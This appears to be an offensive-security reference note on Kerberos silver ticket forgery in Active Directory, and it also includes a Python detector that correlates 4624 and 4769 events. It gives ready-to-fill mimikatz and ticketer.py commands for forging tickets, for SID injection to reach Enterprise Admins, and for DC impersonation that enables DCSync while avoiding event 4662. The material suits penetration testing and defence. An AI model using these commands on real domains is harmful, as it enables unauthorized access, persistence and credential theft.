# Exploitation - Kerberos silver tickets

### Overview

`Service tickets` are generated by the `Ticket-Granting Service (TGS)` of the `Key Distribution Center (KDC)` and used by clients to access domain resources exposed through service accounts, i.e. accounts (user or machine accounts) that have a `ServicePrincipalName (SPN)` configured.

`Service tickets` are generated by the `TGS` upon reception of a valid `Ticket-Granting Ticket (TGT)` using:

* One of the secrets (`RC4 key`, whose value is identical to the `NTLM` hash, or `AES 128/256-bit keys`) of the `krbtgt` account (`KDC Signature`).
* One of the secrets of the targeted service account (`Server Signature` and encryption of the `service ticket`).

However, as the service account has no knowledge of the `krbtgt` account's secrets, the `KDC Signature` is by default not verified when a `service ticket` is received and validated by the service. Thus, in the majority of environments, knowledge of one of the secrets of the targeted service account is sufficient to generate valid `service tickets` for that service (and renewals of the `krbtgt` account's password do not invalidate crafted `service tickets`).

Note that the `Kerberos PAC Validation` mechanism can be enabled on a service to enforce a systematic verification of the `KDC Signature` of the `service ticket`'s `Privilege Attribute Certificate (PAC)` through a request to the `KDC`. As this additional verification requires an exchange between the server hosting the service and the `KDC`, enabling it can cause significant performance degradation.

For more information on the `Kerberos` protocol, refer to the `[ActiveDirectory] Kerberos Golden Tickets` note.

To generate a `silver ticket`, the following prerequisites are needed:

* The fully qualified domain name and the `SID` of the targeted domain.
* The `SPN` and one of the secrets of the targeted service account.

**Computer services and machine account exploitation**

Windows systems joined to an Active Directory domain expose a number of services running under the authority of the machine account. These services can be leveraged to remotely access and execute commands on a machine. As such, the compromise of one of the machine account's secrets can be used to generate `silver tickets` allowing for remote code execution.

`Silver tickets` for machine services can notably be used for persistence after the compromise of a machine or an Active Directory domain (as the secrets of the machine accounts of all the machines joined to the domain are stored in the `ntds.dit` database). Additionally, if a machine exposes the Windows `Spooler` service, through the `MS-RPRN` `MSRPC` interface, and is configured to permit the use of `NetNTLMv1` (`LMCompatibilityLevel` attribute set to 2 or lower), an authentication from the machine to an arbitrary host in `NetNTLMv1` can be remotely triggered and captured, to ultimately crack the `NetNTLMv1` hash and retrieve the machine account `NTLM` hash. For more information on the attack, refer to the `[L7] MSRPC` and `[ActiveDirectory] NTLM capture and relay` notes.

Different services are exposed on Windows systems joined to an Active Directory domain and can be targeted, through their respective `SPN` in the form of `<SERVICE_NAME>/<MACHINE_HOSTNAME>`, for persistence and remote access:

| Possible operation                                    | Service(s)                                                                                                                        | Description                                                                                                                                                  | Related note                                                                            |
| ----------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------- |
| <p><code>PsExec</code>-like<br>file system access</p> | `CIFS`                                                                                                                            | Remote execution of commands using `PsExec`-like utilities or full access to the machine file system.                                                        | <p><code>Windows - Lateral movements</code><br><code>\[L7] 445 - SMB</code></p>         |
| `WMI`                                                 | <p><code>HOST</code><br><code>RPCSS</code></p>                                                                                    | Remote execution of commands through `Windows Management Instrumentation (WMI)` (`Win32_Process` class for example).                                         | `Windows - Lateral movements`                                                           |
| `WinRM`                                               | <p>Always necessary:<br><code>HOST</code><br><code>HTTP</code><br>Host dependent:<br><code>WSMAN</code><br><code>RPCSS</code></p> | `PowerShell remoting` through `Windows Remote Management (WinRM)`.                                                                                           | <p><code>Windows - Lateral movements</code><br><code>\[L7] 5985-5968 - WSMan</code></p> |
| Windows services                                      | `HOST`                                                                                                                            | Remote creation and/or execution of Windows services.                                                                                                        | `Windows - Lateral movements`                                                           |
| Scheduled tasks                                       | `HOST`                                                                                                                            | Remote creation and/or execution of Windows scheduled tasks.                                                                                                 | `Windows - Lateral movements`                                                           |
| <p><code>DCSync</code><br>LDAP access</p>             | `LDAP`                                                                                                                            | `LDAP` requests, and notably allows, for `service tickets` to the `LDAP` service of a `Domain Controller`, the conduct of replication operations (`DCSync`). | `[ActiveDirectory] ntds.dit dumping`                                                    |
| `RSAT`                                                | <p><code>CIFS</code><br><code>LDAP</code><br><code>RPCSS</code></p>                                                               | Use of the PowerShell cmdlets of the Windows `Remote Server Administration Tools (RSAT)` suite.                                                              | `[ActiveDirectory] Domain Recon`                                                        |

The `HOST` service class for Windows machines covers a set of built-in Windows services, such as the `HTTP`, `SCM` and `SCHEDULE` services.

The exhaustive list of service classes mapped to the `HOST` class on a Windows machine joined to an Active Directory domain can be retrieved using the following PowerShell command:

```
# DOMAIN_ROOT_OBJECT = "DC=LAB,DC=AD" for example

Get-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,<DOMAIN_ROOT_OBJECT>" -Properties sPNMappings
```
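As an added example (not code from the original notes), the following Python snippet parses an `sPNMappings` value of the form returned by the command above and resolves which ticket class serves a given SPN. The sample value is constructed for the example, modelled on the default mapping of a Windows domain, and should be replaced by the value read from your own domain; the function names are my own. It generalises the `HOST` case in the text to any alias class present in the attribute.

```python
"""Resolve which Kerberos ticket class serves a given SPN.

Added example, not part of the original notes. The sPNMappings attribute of the
"Directory Service" object maps many service classes (http, rpcss, cifs, ...)
onto the HOST ticket class, so one machine-account key backs all of them.
"""
from typing import Dict, List

# Constructed sample value, modelled on the default mapping. It is not a dump
# of a real domain: always read the attribute from the domain being assessed.
SAMPLE_SPN_MAPPINGS: List[str] = [
    "host=alerter,appmgmt,cisvc,clipsrv,browser,dhcp,dnscache,replicator,"
    "eventlog,eventsystem,policyagent,oakley,dmserver,dns,mcsvc,fax,msiserver,"
    "ias,messenger,netlogon,netman,netdde,netddedsm,nmagent,plugplay,"
    "protectedstorage,rasman,rpclocator,rpc,rpcss,remoteaccess,rsvp,samss,"
    "scardsvr,scesrv,seclogon,scm,dcom,cifs,spooler,snmp,schedule,tapisrv,"
    "trksvr,trkwks,ups,time,wins,www,http,w3svc,iisadmin,msdtc",
]


def parse_spn_mappings(values: List[str]) -> Dict[str, str]:
    """Turn each '<class>=<alias>,<alias>,...' value into alias -> class.

    Classes and aliases are compared case-insensitively, as SPN service
    classes are.
    """
    mapping: Dict[str, str] = {}
    for value in values:
        canonical, _, aliases = value.partition("=")
        canonical = canonical.strip().lower()
        for alias in aliases.split(","):
            alias = alias.strip().lower()
            if alias:
                mapping[alias] = canonical
    return mapping


def ticket_class_for(spn: str, mapping: Dict[str, str]) -> str:
    """Return the ticket class the KDC uses for an SPN such as 'http/srv01.lab.ad'.

    A service class with no alias entry (ldap, mssqlsvc, ...) is served by a
    ticket for that class itself.
    """
    service_class = spn.split("/", 1)[0].lower()
    return mapping.get(service_class, service_class)


def services_covered_by(ticket_class: str, mapping: Dict[str, str]) -> List[str]:
    """List every alias reachable with a ticket of the given class.

    For a defender this is the blast radius of one machine-account key: every
    alias of 'host' is usable with a single forged HOST ticket.
    """
    wanted = ticket_class.lower()
    return sorted(alias for alias, cls in mapping.items() if cls == wanted)


if __name__ == "__main__":
    mapping = parse_spn_mappings(SAMPLE_SPN_MAPPINGS)
    for spn in ("http/srv01.lab.ad", "rpcss/srv01.lab.ad", "ldap/dc01.lab.ad"):
        print(f"{spn:<22} -> {ticket_class_for(spn, mapping)}")
    print("aliases of host:", ", ".join(services_covered_by("host", mapping)))
```

The practical consequence for monitoring is that a `service ticket` for `http/srv01` or `rpcss/srv01` is, on a default domain, a `HOST` ticket encrypted with the machine account key: logs from the `KDC` will show the machine account as the requested service, not the alias.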

### Silver tickets generation

The `mimikatz` utility on Windows and `Impacket`'s `ticketer.py` Python script can be used to generate `silver tickets`:

```
# (mimikatz) /id: / (ticketer.py) -user-id <USER_RID>
# Impersonated user Relative ID (RID). Defaults to 500 (built-in Administrator account RID).

# (mimikatz) /groups: / (ticketer.py) -groups <GROUP_RID | GROUP_RIDS_LIST>
# Impersonated group memberships, as one group RID or a list of group RIDs. Default group RIDs: 513 (Domain Users), 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins), and 519 (Enterprise Admins, only effective if targeting the root domain).

# (mimikatz) /sids: / (ticketer.py) -extra-sid <EXTRA_SID | EXTRA_SIDS_LIST>
# Additional and arbitrary SID(s) (that may or may not belong to the current domain) to include in the PAC, as if the SIDs were defined in the `SIDHistory` attribute of a domain user.

# (mimikatz) /ptt - Directly inject the generated silver ticket in memory.

# From an authorization standpoint, the specified username does not matter.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_SERVER_FQDN> [/rc4:<TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_SERVICE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_SERVICE_ACCOUNT_AES256_KEY>] /service:<TARGETED_SERVICE_NAME> [/id:<USER_RID>] [/groups:<GROUP_RID | GROUP_RIDS_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>] /ptt" "exit"

ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> -spn <SERVICE_FULL_SPN> [-nthash <TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | -aesKey <TARGETED_SERVICE_ACCOUNT_AES128_KEY | TARGETED_SERVICE_ACCOUNT_AES256_KEY>] [-user-id <USER_RID>] [-groups <GROUP_RID | GROUP_RIDS_LIST>] [-extra-sid <EXTRA_SID | EXTRA_SIDS_LIST>] <IMPERSONATED_USERNAME>

# Access to a Windows system through WinRM (PowerShell Remoting) using one of the targeted computer account's secrets.
# Silver tickets for the HOST and HTTP services are necessary and usually sufficient. Silver tickets for the WSMAN and/or RPCSS services may additionally be required.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_COMPUTER_FQDN> [/rc4:<TARGETED_COMPUTER_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_COMPUTER_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_COMPUTER_ACCOUNT_AES256_KEY>] /service:host /ptt" "exit"
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_COMPUTER_FQDN> [/rc4:<TARGETED_COMPUTER_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_COMPUTER_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_COMPUTER_ACCOUNT_AES256_KEY>] /service:http /ptt" "exit"

# Impersonates a user member of the "Enterprise Admins" group of the root domain in order to compromise the root domain from any trusted child domain.
# For more information, refer to the "Active Directory - Trusts hopping" note.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_SERVER_FQDN> [/rc4:<TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_SERVICE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_SERVICE_ACCOUNT_AES256_KEY>] /service:<TARGETED_SERVICE_NAME> /sids:S-1-5-21-<ROOT_DOMAIN_IDENTIFIER-AUTHORITY>-519 /ptt" "exit"

# Impersonates a Domain Controller in order to conduct a DCSync attack without generating Windows "Security" events ("Event 4662: An operation was performed on an object").
# The <IMPERSONATED_DC_RID> is the last component of the SID returned by the following PowerShell command:
(New-Object System.Security.Principal.NTAccount("<DOMAIN>","<DC_MACHINE_ACCOUNT>")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# For more information, refer to the "Active Directory - ntds.dit dumping" note.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_DC_MACHINE_ACCOUNT> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_DC_FQDN> [/rc4:<TARGETED_DC_MACHINE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_DC_MACHINE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_DC_MACHINE_ACCOUNT_AES256_KEY>] /service:ldap /id:<IMPERSONATED_DC_RID> /groups:516 /sids:S-1-5-21-<DOMAIN_IDENTIFIER-AUTHORITY>-516,S-1-5-9 /ptt" "exit"
```

### Silver tickets usage (Pass-the-Ticket)

On Windows, `silver tickets` generated using `mimikatz` are automatically injected in the current logon session if the `/ptt` option is specified. Otherwise, an exported `silver ticket` can be injected using `mimikatz.exe "kerberos::ptt <TICKET_FILE_PATH>"` for example.

On Linux, `silver tickets` generated by `ticketer.py`, in the `credential cache (ccache)` format, can be exported in the `KRB5CCNAME` environment variable for further use through tools supporting the `Kerberos` protocol, such as other `Impacket` Python utilities. Note that `Impacket` utilities can only make use of a single `Kerberos ticket` at a time, which limits the possible usage of the utilities with `silver tickets`.

Refer to the `[ActiveDirectory] Kerberos tickets usage` note for more information on techniques and tools to leverage `silver tickets`.
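From the detection side, the property stated in the overview (a `silver ticket` is minted with the service account secret and never issued by the `KDC`) is what makes the usage of such tickets observable: the target host still records a Kerberos network logon (event `4624`, logon type 3), but no `Domain Controller` holds a matching `4769` (`service ticket` requested) for that account and service. The following Python snippet, an added example and not code from the original notes, correlates the two sources over constructed sample events written in a simplified `key=value` form; the field names (`user`, `service`, `host`, `domain`, `logon_type`, `auth`, `ip`), the `LAB` NetBIOS domain name and the 10-hour window are assumptions to adapt to your own log pipeline.

```python
"""Correlate host 4624 Kerberos logons with DC 4769 ticket issuance.

Added example, not part of the original notes. A silver ticket is forged with
the service account key, so the KDC never logs a 4769 for it, while the target
host still logs a 4624 (logon type 3, authentication package Kerberos). The
events below are constructed samples in a simplified form, not real exports.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

EXPECTED_NETBIOS_DOMAIN = "LAB"        # assumption: the domain's NetBIOS name
TICKET_LIFETIME = timedelta(hours=10)  # default maximum service ticket lifetime

# Constructed DC events (4769: a service ticket was requested). "service" is
# the account backing the SPN, i.e. the machine account for HOST-class tickets.
DC_4769_EVENTS = [
    "ts=2024-05-01T08:00:05 id=4769 user=alice@LAB.AD service=SRV01$ ip=10.0.0.15",
    "ts=2024-05-01T08:10:00 id=4769 user=svc_backup@LAB.AD service=SRV02$ ip=10.0.0.20",
]
# Constructed member-server events (4624). The last one has no 4769 behind it
# and carries the domain FQDN where the NetBIOS name is expected.
HOST_4624_EVENTS = [
    "ts=2024-05-01T08:00:07 id=4624 host=srv01 user=alice domain=LAB logon_type=3 auth=Kerberos ip=10.0.0.15",
    "ts=2024-05-01T08:10:03 id=4624 host=srv02 user=svc_backup domain=LAB logon_type=3 auth=Kerberos ip=10.0.0.20",
    "ts=2024-05-01T09:30:00 id=4624 host=srv01 user=Administrator domain=lab.ad logon_type=3 auth=Kerberos ip=10.0.0.99",
]


@dataclass
class Event:
    ts: datetime
    fields: Dict[str, str]


def parse_event(line: str) -> Event:
    """Parse one constructed 'key=value key=value ...' line into an Event."""
    fields = dict(token.split("=", 1) for token in line.split())
    return Event(datetime.fromisoformat(fields.pop("ts")), fields)


def find_suspect_logons(dc_lines: List[str], host_lines: List[str],
                        window: timedelta = TICKET_LIFETIME) -> List[Dict[str, str]]:
    """Flag Kerberos network logons that no DC-issued service ticket explains.

    A legitimately cached ticket may be reused for up to its lifetime after
    the 4769, so the lookback window must be at least that long.
    """
    issued: List[Tuple[datetime, str, str]] = []
    for ev in map(parse_event, dc_lines):
        if ev.fields.get("id") != "4769":
            continue
        user = ev.fields["user"].split("@")[0].lower()
        service_host = ev.fields["service"].rstrip("$").lower()
        issued.append((ev.ts, user, service_host))

    findings: List[Dict[str, str]] = []
    for ev in map(parse_event, host_lines):
        f = ev.fields
        if f.get("id") != "4624" or f.get("logon_type") != "3" or f.get("auth") != "Kerberos":
            continue
        user, host = f["user"].lower(), f["host"].lower()
        backed_by_kdc = any(
            u == user and s == host and timedelta(0) <= ev.ts - t <= window
            for t, u, s in issued
        )
        reasons = []
        if not backed_by_kdc:
            reasons.append("no 4769 on the DC for this account and service within the ticket lifetime")
        # Heuristic: forged tickets frequently carry the domain as typed by the
        # forger (often the FQDN) where Windows would log the NetBIOS name.
        if f.get("domain") != EXPECTED_NETBIOS_DOMAIN:
            reasons.append("domain field is not the expected NetBIOS name")
        if reasons:
            findings.append({"host": f["host"], "user": f["user"],
                             "ip": f.get("ip", ""), "reasons": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for finding in find_suspect_logons(DC_4769_EVENTS, HOST_4624_EVENTS):
        print(finding)
```

Two caveats apply when running this logic on real data: the `4769` side must be collected from every `Domain Controller` (any DC may have issued the ticket), and the domain-name heuristic is only a hint, as mis-typed or non-default domain fields also occur in legitimate traffic. A `4624` with no `4769` within the ticket lifetime is the stronger signal, and enabling `Kerberos PAC Validation` on high-value services turns the same condition into a hard failure instead of a log correlation.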

***

### References

* <https://2014.rmll.info/slides/80/day_3-1010-Benjamin_Delpy-Mimikatz_a_short_journey_inside_the_memory_of_the_Windows_Security_service.pdf>
* <https://adsecurity.org/?page_id=1821>
* Techniques de persistance Active Directory basées sur Kerberos (Kerberos-based Active Directory persistence techniques) - MISC Hors-Série N°20
* <https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html>


